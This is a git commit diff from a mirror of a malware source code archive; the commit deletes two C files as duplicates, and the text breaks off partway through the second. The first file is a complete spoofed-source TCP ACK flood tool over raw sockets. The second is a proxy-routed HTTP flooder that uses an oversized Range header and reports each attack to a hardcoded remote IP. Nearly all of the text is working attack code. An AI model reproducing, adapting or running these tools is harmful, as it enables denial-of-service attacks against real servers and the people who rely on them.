mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 04:15:26 +00:00
Removed accidental dupes
This commit is contained in:
parent
d44d9b59a7
commit
208683099b
Binary file not shown.
@ -1,194 +0,0 @@
|
|||||||
/*
|
|
||||||
This is released under the GNU GPL License v3.0, and is allowed to be used for cyber warfare. ;)
|
|
||||||
*/
|
|
||||||
#include <unistd.h>
|
|
||||||
#include <time.h>
|
|
||||||
#include <sys/types.h>
|
|
||||||
#include <sys/socket.h>
|
|
||||||
#include <sys/ioctl.h>
|
|
||||||
#include <string.h>
|
|
||||||
#include <stdlib.h>
|
|
||||||
#include <stdio.h>
|
|
||||||
#include <pthread.h>
|
|
||||||
#include <netinet/tcp.h>
|
|
||||||
#include <netinet/ip.h>
|
|
||||||
#include <netinet/in.h>
|
|
||||||
#include <netinet/if_ether.h>
|
|
||||||
#include <netdb.h>
|
|
||||||
#include <net/if.h>
|
|
||||||
#include <arpa/inet.h>
|
|
||||||
#define MAX_PACKET_SIZE 4096
|
|
||||||
#define PHI 0x9e3779b9
|
|
||||||
static unsigned long int Q[4096], c = 362436;
|
|
||||||
volatile int limiter;
|
|
||||||
volatile unsigned int pps;
|
|
||||||
volatile unsigned int sleeptime = 100;
|
|
||||||
void init_rand(unsigned long int x)
|
|
||||||
{
|
|
||||||
int i;
|
|
||||||
Q[0] = x;
|
|
||||||
Q[1] = x + PHI;
|
|
||||||
Q[2] = x + PHI + PHI;
|
|
||||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
|
||||||
}
|
|
||||||
unsigned long int rand_cmwc(void)
|
|
||||||
{
|
|
||||||
unsigned long long int t, a = 18782LL;
|
|
||||||
static unsigned long int i = 4095;
|
|
||||||
unsigned long int x, r = 0xfffffffe;
|
|
||||||
i = (i + 1) & 4095;
|
|
||||||
t = a * Q[i] + c;
|
|
||||||
c = (t >> 32);
|
|
||||||
x = t + c;
|
|
||||||
if (x < c) {
|
|
||||||
x++;
|
|
||||||
c++;
|
|
||||||
}
|
|
||||||
return (Q[i] = r - x);
|
|
||||||
}
|
|
||||||
unsigned short csum (unsigned short *buf, int count)
|
|
||||||
{
|
|
||||||
register unsigned long sum = 0;
|
|
||||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
|
||||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
|
||||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
|
||||||
return (unsigned short)(~sum);
|
|
||||||
}
|
|
||||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
|
||||||
struct tcp_pseudo
|
|
||||||
{
|
|
||||||
unsigned long src_addr;
|
|
||||||
unsigned long dst_addr;
|
|
||||||
unsigned char zero;
|
|
||||||
unsigned char proto;
|
|
||||||
unsigned short length;
|
|
||||||
} pseudohead;
|
|
||||||
unsigned short total_len = iph->tot_len;
|
|
||||||
pseudohead.src_addr=iph->saddr;
|
|
||||||
pseudohead.dst_addr=iph->daddr;
|
|
||||||
pseudohead.zero=0;
|
|
||||||
pseudohead.proto=IPPROTO_TCP;
|
|
||||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
|
||||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
|
||||||
unsigned short *tcp = malloc(totaltcp_len);
|
|
||||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
|
||||||
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
|
||||||
unsigned short output = csum(tcp,totaltcp_len);
|
|
||||||
free(tcp);
|
|
||||||
return output;
|
|
||||||
}
|
|
||||||
void setup_ip_header(struct iphdr *iph)
|
|
||||||
{
|
|
||||||
iph->ihl = 5;
|
|
||||||
iph->version = 4;
|
|
||||||
iph->tos = 0;
|
|
||||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
|
||||||
iph->id = htonl(54321);
|
|
||||||
iph->frag_off = 0;
|
|
||||||
iph->ttl = MAXTTL;
|
|
||||||
iph->protocol = 6;
|
|
||||||
iph->check = 0;
|
|
||||||
iph->saddr = inet_addr("192.168.3.100");
|
|
||||||
}
|
|
||||||
void setup_tcp_header(struct tcphdr *tcph)
|
|
||||||
{
|
|
||||||
tcph->source = htons(5678);
|
|
||||||
tcph->seq = rand();
|
|
||||||
tcph->ack_seq = 1;
|
|
||||||
tcph->res2 = 0;
|
|
||||||
tcph->doff = 5;
|
|
||||||
tcph->ack = 1;
|
|
||||||
tcph->window = htons(65535);
|
|
||||||
tcph->check = 0;
|
|
||||||
tcph->urg_ptr = 0;
|
|
||||||
}
|
|
||||||
void *flood(void *par1)
|
|
||||||
{
|
|
||||||
char *td = (char *)par1;
|
|
||||||
char datagram[MAX_PACKET_SIZE];
|
|
||||||
struct iphdr *iph = (struct iphdr *)datagram;
|
|
||||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
|
||||||
struct sockaddr_in sin;
|
|
||||||
sin.sin_family = AF_INET;
|
|
||||||
sin.sin_port = htons (rand() % 20480);
|
|
||||||
sin.sin_addr.s_addr = inet_addr(td);
|
|
||||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
|
||||||
if(s < 0){
|
|
||||||
fprintf(stderr, ":: cant open raw socket. got root?\n");
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
|
||||||
setup_ip_header(iph);
|
|
||||||
setup_tcp_header(tcph);
|
|
||||||
tcph->dest = htons (rand() % 20480);
|
|
||||||
iph->daddr = sin.sin_addr.s_addr;
|
|
||||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
|
||||||
int tmp = 1;
|
|
||||||
const int *val = &tmp;
|
|
||||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
|
||||||
fprintf(stderr, ":: motherfucking error.\n");
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
init_rand(time(NULL));
|
|
||||||
register unsigned int i;
|
|
||||||
i = 0;
|
|
||||||
while(1){
|
|
||||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
|
||||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
|
||||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
|
||||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
|
||||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
|
||||||
tcph->source = htons(rand_cmwc() & 0xFFFF);
|
|
||||||
tcph->check = 0;
|
|
||||||
tcph->check = tcpcsum(iph, tcph);
|
|
||||||
pps++;
|
|
||||||
if(i >= limiter)
|
|
||||||
{
|
|
||||||
i = 0;
|
|
||||||
usleep(sleeptime);
|
|
||||||
}
|
|
||||||
i++;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
int main(int argc, char *argv[ ])
|
|
||||||
{
|
|
||||||
if(argc < 5){
|
|
||||||
fprintf(stderr, "Invalid parameters!\n");
|
|
||||||
fprintf(stdout, "Usage: %s <IP> <threads> <throttle, -1 for no throttle> <time>\n", argv[0]);
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
int num_threads = atoi(argv[2]);
|
|
||||||
int maxpps = atoi(argv[3]);
|
|
||||||
limiter = 0;
|
|
||||||
pps = 0;
|
|
||||||
pthread_t thread[num_threads];
|
|
||||||
int multiplier = 20;
|
|
||||||
int i;
|
|
||||||
for(i = 0;i<num_threads;i++){
|
|
||||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
|
||||||
}
|
|
||||||
fprintf(stdout, ":: sending all the packets..\n");
|
|
||||||
for(i = 0;i<(atoi(argv[4])*multiplier);i++)
|
|
||||||
{
|
|
||||||
usleep((1000/multiplier)*1000);
|
|
||||||
if((pps*multiplier) > maxpps)
|
|
||||||
{
|
|
||||||
if(1 > limiter)
|
|
||||||
{
|
|
||||||
sleeptime+=100;
|
|
||||||
} else {
|
|
||||||
limiter--;
|
|
||||||
}
|
|
||||||
} else {
|
|
||||||
limiter++;
|
|
||||||
if(sleeptime > 25)
|
|
||||||
{
|
|
||||||
sleeptime-=25;
|
|
||||||
} else {
|
|
||||||
sleeptime = 0;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
pps = 0;
|
|
||||||
}
|
|
||||||
return 0;
|
|
||||||
}
|
|
@ -1,709 +0,0 @@
|
|||||||
#include <pthread.h>
|
|
||||||
#include <sys/resource.h>
|
|
||||||
#include <unistd.h>
|
|
||||||
#include <stdio.h>
|
|
||||||
#include <stdlib.h>
|
|
||||||
#include <string.h>
|
|
||||||
#include <signal.h>
|
|
||||||
#include <sys/socket.h>
|
|
||||||
#include <netinet/ip.h>
|
|
||||||
#include <netinet/tcp.h>
|
|
||||||
#include <netdb.h>
|
|
||||||
#include <netinet/in.h>
|
|
||||||
#include <arpa/inet.h>
|
|
||||||
#include <ctype.h>
|
|
||||||
|
|
||||||
#define RND_CHAR (char)((rand() % 26)+97)
|
|
||||||
|
|
||||||
char *useragents[] = {
|
|
||||||
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
|
||||||
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
|
|
||||||
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
|
|
||||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
|
|
||||||
"Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
|
||||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
|
|
||||||
"Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
|
||||||
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
|
|
||||||
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
|
|
||||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
|
||||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
|
|
||||||
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
|
|
||||||
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
|
|
||||||
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
|
|
||||||
"Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
|
|
||||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
|
||||||
"Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
|
|
||||||
"Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]",
|
|
||||||
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0",
|
|
||||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
|
|
||||||
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6",
|
|
||||||
"Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
|
|
||||||
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)",
|
|
||||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
|
|
||||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
|
|
||||||
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
|
|
||||||
"Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1",
|
|
||||||
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
|
|
||||||
"Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02",
|
|
||||||
"Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60",
|
|
||||||
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
|
|
||||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
|
|
||||||
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)",
|
|
||||||
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 3.5.30729)",
|
|
||||||
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
|
|
||||||
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
|
||||||
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
|
|
||||||
"Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre",
|
|
||||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
|
|
||||||
"Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0",
|
|
||||||
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
|
||||||
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0",
|
|
||||||
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.8 (build 4157); .NET CLR 2.0.50727; AskTbPTV/5.11.3.15590)",
|
|
||||||
"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
|
||||||
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
|
|
||||||
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.5 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.4",
|
|
||||||
"Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
|
||||||
"Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
|
|
||||||
};
|
|
||||||
#define ATTACKPORT 80
|
|
||||||
//char *postformat = "%s /%s HTTP/1.1\r\nHost: %s\r\nUser-Agent: #useragent#\r\nConnection: close\r\nAccept-Encoding: gzip, deflate\r\n%s\r\n%s";
|
|
||||||
char *postformat = "HEAD / HTTP/1.0\r\nHost: %s\r\nUser-Agent: %s\r\nRange:bytes=%s\r\nAccept-Encoding: gzip, deflate, compress\r\nConnection: close\r\n\r\n";
|
|
||||||
char *postpayload;
|
|
||||||
struct urlparts {
|
|
||||||
char * name;
|
|
||||||
char separator[4];
|
|
||||||
char value[128];
|
|
||||||
} parts[] = {
|
|
||||||
{ "scheme", ":" },
|
|
||||||
{ "userid", "@" },
|
|
||||||
{ "password", ":" },
|
|
||||||
{ "host", "//" },
|
|
||||||
{ "port", ":" },
|
|
||||||
{ "path", "/" },
|
|
||||||
{ "param", ";" },
|
|
||||||
/*{ "query", "?" },*/
|
|
||||||
{ "fragment", "#" }
|
|
||||||
};
|
|
||||||
enum partnames { scheme = 0, userid, password, host, port, path, param, query, fragment } ;
|
|
||||||
#define NUMPARTS (sizeof parts / sizeof (struct urlparts))
|
|
||||||
struct urlparts *returnparts[8];
|
|
||||||
struct urllist { char *url; int done; struct urllist *next; struct urllist *prev; };
|
|
||||||
struct proxy { char *type; char *ip; int port; int working; };
|
|
||||||
struct list { struct proxy *data; char *useragent; struct list *next; struct list *prev; };
|
|
||||||
struct list *head = NULL;
|
|
||||||
char parseError[128];
|
|
||||||
int parseURL(char *url, struct urlparts **returnpart);
|
|
||||||
char * strsplit(char * s, char * tok);
|
|
||||||
char firstpunc(char *s);
|
|
||||||
int strleft(char * s, int n);
|
|
||||||
void setupparts();
|
|
||||||
void freeparts();
|
|
||||||
char *stristr(const char *String, const char *Pattern);
|
|
||||||
char *str_replace(char *orig, char *rep, char *with);
|
|
||||||
char *geturl(char *url, char *useragent, char *ip);
|
|
||||||
char *ipstr;
|
|
||||||
unsigned int fnGetIP(char *szHost);
|
|
||||||
static int rps = 0;
|
|
||||||
|
|
||||||
char *fznGenerateRange()
|
|
||||||
{
|
|
||||||
char szBytes[12000] = "0-";
|
|
||||||
char szAdd[12];
|
|
||||||
for (int i = 0; i <= 1299; i++)
|
|
||||||
{
|
|
||||||
sprintf(szAdd, ",5-%d", i);
|
|
||||||
strcat(szBytes, szAdd);
|
|
||||||
bzero(szAdd, 12);
|
|
||||||
}
|
|
||||||
|
|
||||||
return szBytes;
|
|
||||||
}
|
|
||||||
|
|
||||||
void *flood(void *par) {
|
|
||||||
struct list *startpoint = (struct list *)par;
|
|
||||||
int i;
|
|
||||||
struct sockaddr_in serverAddr;
|
|
||||||
signal(SIGPIPE, SIG_IGN);
|
|
||||||
while(1)
|
|
||||||
{
|
|
||||||
int sent = 0;
|
|
||||||
if(startpoint->data->working == 0)
|
|
||||||
{
|
|
||||||
startpoint = startpoint->next;
|
|
||||||
usleep(10000);
|
|
||||||
continue;
|
|
||||||
}
|
|
||||||
|
|
||||||
memset(&serverAddr, 0, sizeof(serverAddr));
|
|
||||||
serverAddr.sin_family = AF_INET;
|
|
||||||
serverAddr.sin_port = htons(startpoint->data->port);
|
|
||||||
serverAddr.sin_addr.s_addr = inet_addr(startpoint->data->ip);
|
|
||||||
int serverSocket = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
|
|
||||||
u_int yes=1;
|
|
||||||
if (setsockopt(serverSocket,SOL_SOCKET,SO_REUSEADDR,&yes,sizeof(yes)) < 0) {}
|
|
||||||
if(connect(serverSocket, (struct sockaddr *)&serverAddr, sizeof(serverAddr)) > 0)
|
|
||||||
{
|
|
||||||
startpoint->data->working = 0;
|
|
||||||
startpoint = startpoint->next;
|
|
||||||
continue;
|
|
||||||
}
|
|
||||||
if(strcmp(startpoint->data->type, "Socks4")==0)
|
|
||||||
{
|
|
||||||
unsigned char buf[10];
|
|
||||||
buf[0] = 0x04;
|
|
||||||
buf[1] = 0x01;
|
|
||||||
*(unsigned short*)&buf[2] = htons(ATTACKPORT);
|
|
||||||
*(unsigned long*)&buf[4] = inet_addr(ipstr);
|
|
||||||
buf[8] = 0x00;
|
|
||||||
if(send(serverSocket, buf, 9, MSG_NOSIGNAL) != 9)
|
|
||||||
{
|
|
||||||
startpoint->data->working = 0;
|
|
||||||
startpoint = startpoint->next;
|
|
||||||
close(serverSocket);
|
|
||||||
continue;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
if(strcmp(startpoint->data->type, "Socks5")==0)
|
|
||||||
{
|
|
||||||
unsigned char buf[20];
|
|
||||||
buf[0] = 0x05;
|
|
||||||
buf[1] = 0x01;
|
|
||||||
buf[2] = 0x00;
|
|
||||||
if((sent = send(serverSocket, buf, 3, MSG_NOSIGNAL)) < 0)
|
|
||||||
{
|
|
||||||
startpoint->data->working = 0;
|
|
||||||
startpoint = startpoint->next;
|
|
||||||
close(serverSocket);
|
|
||||||
continue;
|
|
||||||
}
|
|
||||||
buf[0] = 0x05;
|
|
||||||
buf[1] = 0x01;
|
|
||||||
buf[2] = 0x00;
|
|
||||||
buf[3] = 0x01;
|
|
||||||
*(unsigned long*)&buf[4] = inet_addr(ipstr);
|
|
||||||
*(unsigned short*)&buf[8] = htons(ATTACKPORT);
|
|
||||||
if((sent = send(serverSocket, buf, 10, MSG_NOSIGNAL)) < 0)
|
|
||||||
{
|
|
||||||
startpoint->data->working = 0;
|
|
||||||
startpoint = startpoint->next;
|
|
||||||
close(serverSocket);
|
|
||||||
continue;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
if(strcmp(startpoint->data->type, "CONNECT") == 0 || strcmp(startpoint->data->type, "TUNNEL") == 0)
|
|
||||||
{
|
|
||||||
char *connectrequest = malloc(1024);
|
|
||||||
bzero(connectrequest, 1024);
|
|
||||||
sprintf(connectrequest, "CONNECT %s:25565 HTTP/1.0\r\n\r\n", ipstr);
|
|
||||||
if((sent = send(serverSocket, connectrequest, strlen(connectrequest), MSG_NOSIGNAL)) < 0)
|
|
||||||
{
|
|
||||||
startpoint->data->working = 0;
|
|
||||||
startpoint = startpoint->next;
|
|
||||||
close(serverSocket);
|
|
||||||
continue;
|
|
||||||
}
|
|
||||||
char *recvbuf = malloc(1024);
|
|
||||||
bzero(recvbuf, 1024);
|
|
||||||
int gotbytes = recv(serverSocket, recvbuf, 1024, 0);
|
|
||||||
if(gotbytes < 1)
|
|
||||||
{
|
|
||||||
startpoint->data->working = 0;
|
|
||||||
startpoint = startpoint->next;
|
|
||||||
close(serverSocket);
|
|
||||||
continue;
|
|
||||||
}
|
|
||||||
free(recvbuf);
|
|
||||||
}
|
|
||||||
//char *httppayload = str_replace(postpayload, "#useragent#", startpoint->useragent);
|
|
||||||
//if(httppayload == NULL)
|
|
||||||
//{
|
|
||||||
// startpoint = startpoint->next;
|
|
||||||
// close(serverSocket);
|
|
||||||
// continue;
|
|
||||||
//}
|
|
||||||
//char *tmp = NULL;
|
|
||||||
//while((tmp = strstr(httppayload, "%RANDOM%"))!=NULL)
|
|
||||||
/*{
|
|
||||||
*(tmp) = RND_CHAR;
|
|
||||||
*(tmp+1) = RND_CHAR;
|
|
||||||
*(tmp+2) = RND_CHAR;
|
|
||||||
*(tmp+3) = RND_CHAR;
|
|
||||||
*(tmp+4) = RND_CHAR;
|
|
||||||
*(tmp+5) = RND_CHAR;
|
|
||||||
*(tmp+6) = RND_CHAR;
|
|
||||||
*(tmp+7) = RND_CHAR;
|
|
||||||
}
|
|
||||||
*/
|
|
||||||
|
|
||||||
send(serverSocket, postpayload, strlen(postpayload), MSG_NOSIGNAL);
|
|
||||||
//free(httppayload);
|
|
||||||
close(serverSocket);
|
|
||||||
rps++;
|
|
||||||
usleep(50000);
|
|
||||||
//startpoint = startpoint->next;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
int fnAttackInformation(int attackID)
|
|
||||||
{
|
|
||||||
char szRecvBuff[1024];
|
|
||||||
char packet[1024];
|
|
||||||
char ip[] = "37.221.170.5";
|
|
||||||
|
|
||||||
snprintf(packet, sizeof(packet) - 1, "GET /~dqyefldi/response.php?auth=tru&id=%d&pro=%d HTTP/1.1\r\nHost: %s\r\nConnection: close\r\nCache-Control: no-cache\r\nOrigin: http://google.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\nAccept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n\r\n", attackID, getpid(), ip);
|
|
||||||
|
|
||||||
struct sockaddr_in *remote;
|
|
||||||
int sock;
|
|
||||||
int tmpres;
|
|
||||||
|
|
||||||
|
|
||||||
if((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
|
|
||||||
{
|
|
||||||
perror("Can't create TCP socket");
|
|
||||||
exit(1);
|
|
||||||
}
|
|
||||||
|
|
||||||
remote = (struct sockaddr_in *)malloc(sizeof(struct sockaddr_in *));
|
|
||||||
remote->sin_family = AF_INET;
|
|
||||||
tmpres = inet_pton(AF_INET, ip, (void *)(&(remote->sin_addr.s_addr)));
|
|
||||||
|
|
||||||
if (tmpres < 0)
|
|
||||||
{
|
|
||||||
perror("Can't set remote->sin_addr.s_addr");
|
|
||||||
exit(1);
|
|
||||||
}
|
|
||||||
else if (tmpres == 0)
|
|
||||||
{
|
|
||||||
fprintf(stderr, "%s is not a valid IP address\n", ip);
|
|
||||||
exit(1);
|
|
||||||
}
|
|
||||||
|
|
||||||
remote->sin_port = htons(80);
|
|
||||||
|
|
||||||
if (connect(sock, (struct sockaddr *)remote, sizeof(struct sockaddr)) < 0)
|
|
||||||
{
|
|
||||||
perror("Could not connect");
|
|
||||||
exit(1);
|
|
||||||
}
|
|
||||||
|
|
||||||
tmpres = send(sock, packet, strlen(packet), 0);
|
|
||||||
|
|
||||||
//printf("Sent %d bytes -> \n%s\n\n\n", tmpres, packet);
|
|
||||||
|
|
||||||
if (tmpres == -1){
|
|
||||||
perror("Can't send query");
|
|
||||||
exit(1);
|
|
||||||
}
|
|
||||||
|
|
||||||
int i = 1;
|
|
||||||
int dwTotal = 0;
|
|
||||||
|
|
||||||
|
|
||||||
while (1)
|
|
||||||
{
|
|
||||||
i = recv(sock, szRecvBuff + dwTotal, sizeof(szRecvBuff) - dwTotal, 0);
|
|
||||||
//printf("Received %d bytes\n", i);
|
|
||||||
if (i <= 0)
|
|
||||||
break;
|
|
||||||
|
|
||||||
dwTotal += i;
|
|
||||||
}
|
|
||||||
|
|
||||||
szRecvBuff[dwTotal] = '\0';
|
|
||||||
|
|
||||||
|
|
||||||
//printf("Received -> \n%s\n\n", szRecvBuff);
|
|
||||||
|
|
||||||
|
|
||||||
close(sock);
|
|
||||||
|
|
||||||
//printf("Sent %d bytes\n", tmpres);
|
|
||||||
|
|
||||||
return 0;
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
int main(int argc, char *argv[ ]) {
|
|
||||||
if(argc < 6){
|
|
||||||
fprintf(stderr, "Invalid parameters!\n");
|
|
||||||
fprintf(stdout, "Usage: %s <target url> <method (GET or HEAD or POST)> <number threads to use> <proxy list> <time> [manual ip (0 to disable)] [post parameters (%RANDOM% will be replaced with random shit)]\n", argv[0]);
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
//fprintf(stdout, "Setting up Sockets...\n");
|
|
||||||
int num_threads = atoi(argv[3]);
|
|
||||||
char *method = argv[2];
|
|
||||||
if(!(strcmp(method, "GET")==0 || strcmp(method, "HEAD")==0|| strcmp(method, "POST")==0))
|
|
||||||
{
|
|
||||||
fprintf(stderr, "Invalid parameters!\n");
|
|
||||||
fprintf(stdout, "Usage: %s <target url> <method (GET or HEAD or POST)> <number threads to use> <proxy list> <time> [manual ip (0 to disable)] [post parameters (%RANDOM% will be replaced with random shit)]\n", argv[0]);
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
FILE *pFile = fopen(argv[4], "rb");
|
|
||||||
if(pFile==NULL)
|
|
||||||
{
|
|
||||||
perror("fopen"); exit(1);
|
|
||||||
}
|
|
||||||
fseek(pFile, 0, SEEK_END);
|
|
||||||
long lSize = ftell(pFile);
|
|
||||||
rewind(pFile);
|
|
||||||
char *buffer = (char *)malloc(lSize*sizeof(char));
|
|
||||||
fread(buffer, 1, lSize, pFile);
|
|
||||||
fclose (pFile);
|
|
||||||
int i=0;
|
|
||||||
char *pch = (char *)strtok(buffer, ":");
|
|
||||||
while(pch != NULL)
|
|
||||||
{
|
|
||||||
if(head == NULL)
|
|
||||||
{
|
|
||||||
head = (struct list *)malloc(sizeof(struct list));
|
|
||||||
bzero(head, sizeof(struct list));
|
|
||||||
head->data = (struct proxy *)malloc(sizeof(struct proxy));
|
|
||||||
bzero(head->data, sizeof(struct proxy));
|
|
||||||
head->data->working = 1;
|
|
||||||
head->data->ip = malloc(strlen(pch)+1); strcpy(head->data->ip, pch);
|
|
||||||
pch = (char *)strtok(NULL, ":");
|
|
||||||
if(pch == NULL) exit(-1);
|
|
||||||
head->data->port = atoi(pch);
|
|
||||||
pch = (char *)strtok(NULL, ":");
|
|
||||||
